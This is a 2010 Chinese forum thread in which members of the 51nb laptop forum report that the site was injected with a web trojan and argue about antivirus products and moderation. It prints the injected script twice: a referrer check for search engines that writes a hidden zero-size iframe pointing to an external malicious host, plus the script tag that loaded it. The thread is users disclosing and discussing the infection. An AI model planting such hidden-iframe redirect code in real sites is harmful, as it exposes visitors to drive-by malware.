51nb 被挂马了,怎么几天没人管呢? [图]
51nb 被挂马了,怎么几天没人管呢? 应该也有很多黑友发现吧! 木马代码见 http://www.ibmnb.com/post.php?action=edit&extra=page%3D1&editsubmit=yes&mod=奇怪 我把论坛的病毒代码发布出来的帖子被删除啦
[ Edited by13236608421 on 2010-6-24 10:33 ] Posted by 13236608421 on 2010-6-24 10:02 http://www.ibmnb.com/images/common/back.gif
木马代码见 http://www.ibmnb.com/post.php?action=edit&extra=page%3D1&editsubmit=yes&mod=
已删,谢谢提醒。 还是没有解决 卡巴斯基2010没有报马 竟然还有用360的 Posted by jarodpeach on 2010-6-24 10:14 http://www.ibmnb.com/images/common/back.gif
竟然还有用360的
大部分人还是在用的,而且不光是360报啊,TT也报啊 360也敢用,唉......................... Posted by phantomsea on 2010-6-24 10:13 http://www.ibmnb.com/images/common/back.gif
卡巴斯基2010没有报马
那就赶快卸载掉吧
病毒代码我都写写出来了 这种杀毒软件还敢用? 卡巴2010没有出现问题。 Posted by jarodpeach on 2010-6-24 10:14 http://www.ibmnb.com/images/common/back.gif
竟然还有用360的
论坛有病毒代码 咋还怪上安全软件啦?
莫非病人有病都是因为有了医生? 哇!!!
腾讯。。。。360。。。 鲁大师 。。。
瞎了我的狗眼!!!
回复 #11 13236608421 的帖子
360自己就是个病毒 Posted by 13236608421 on 2010-6-24 10:24 http://www.ibmnb.com/images/common/back.gif论坛有病毒代码 咋还怪上安全软件啦?
莫非病人有病都是因为有了医生?
---------------
很多人,思维被固定了,媚外得很,莫怪莫怪:D
回复 #11 13236608421 的帖子
我只看到指定的主题不存在或已被删除或正在被审核,请返回。 昨天的主题也被删除了,论坛方面不出来解释只是删帖不是解决之策。 Posted by jarodpeach on 2010-6-24 10:26 http://www.ibmnb.com/images/common/back.gif360自己就是个病毒
防病毒工具本来就都是跟病毒一样的程序
就像JC跟流氓在多数指标上是完全一样的 Posted by jarodpeach on 2010-6-24 10:26 http://www.ibmnb.com/images/common/back.gif
我只看到指定的主题不存在或已被删除或正在被审核,请返回。
为了广告收入出卖注册会员 Posted by 8610 on 2010-6-24 10:24 http://www.ibmnb.com/images/common/back.gif
哇!!!
腾讯。。。。360。。。 鲁大师 。。。
瞎了我的狗眼!!!
排这个,哈哈 Posted by alanfly on 2010-6-24 10:38 http://www.ibmnb.com/images/common/back.gif
昨天的主题也被删除了,论坛方面不出来解释只是删帖不是解决之策。
问题是 删除帖子不给理由
回复 #20 13236608421 的帖子
我不关心理由,只关心代码是怎么写的,危害有多严重 说真的,我一直看不上360,不是因为它不好,而是因为做它的人是周总,这个人的人品真的不咋的,从3721到YAHOO,我是不敢用一个曾经的流氓做出来的东西 Posted by jarodpeach on 2010-6-24 10:43 http://thinkpad.cn/forum/images/common/back.gif我不关心理由,只关心代码是怎么写的,危害有多严重
就是这个地址:http://union.7pk.com/tmp/51nb.gif?%A1%A7
代码如下:
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".sogou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".soso.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".gougou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".118114.cn");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".bing.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".youdao.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".yahoo.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
} Posted by jarodpeach on 2010-6-24 10:43 http://www.ibmnb.com/images/common/back.gif
我不关心理由,只关心代码是怎么写的,危害有多严重
<script src=http://union.7pk.com/tmp/51nb.gif?¨></script>
放在标题下 关键字以前
明显是 代码权限完全优先于网站内容权限
按照本论坛某版主说是量子统计
那么常规统计代码都是放在页面最下方 而这个放在页面最上方
union.7pk.com 域名是 快车联盟 ,估计是 交换链接链接 或者赚钱同盟一类 具体安全否 看解析后
看到有各大搜索引擎的域名 莫非是seo优化代码?
如果这个代码确实有效我也加自己网站试试
安全性您自己看吧
8866.org 这个是动态域名解析的那个吧 希网 好像是 我也有一个在用 xitong.2288.org
工具google的那次 用的也似这个二级域名
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".sogou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".soso.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".gougou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".118114.cn");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".bing.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".youdao.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".yahoo.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
} 至少这个代码会增加 会员打开51nb网站的同时访问一堆彼得网站的流量
且代码次序看 属于 别人的网站优于51nb网站
如果是商业礼仪推荐吧这个代码挪到 输出页面的最下部 至少 对开启网页速度影响小点
至于是不是别有用心,因为这个代码的实际内容 是链接到别的网站.人家那边随意修改下执行代码,就可以做任何事情 因此会员 做好心理准备 该装杀毒的装杀毒 该申请密码保护的申请密码保护
该修改网银密码的修改网银密码 该挂失的挂失
别到时候 一扎眼几百万没啦 哭都没地方哭 好怕怕的,专门网又不能不上,用证书或者动态密码有问题没? 昨天,今天进来,都有瑞星拦截.(大规模爆发性网马群 V)
代码已经清理掉啦
但是谁对修改我头像的人 负责?
页:
[1]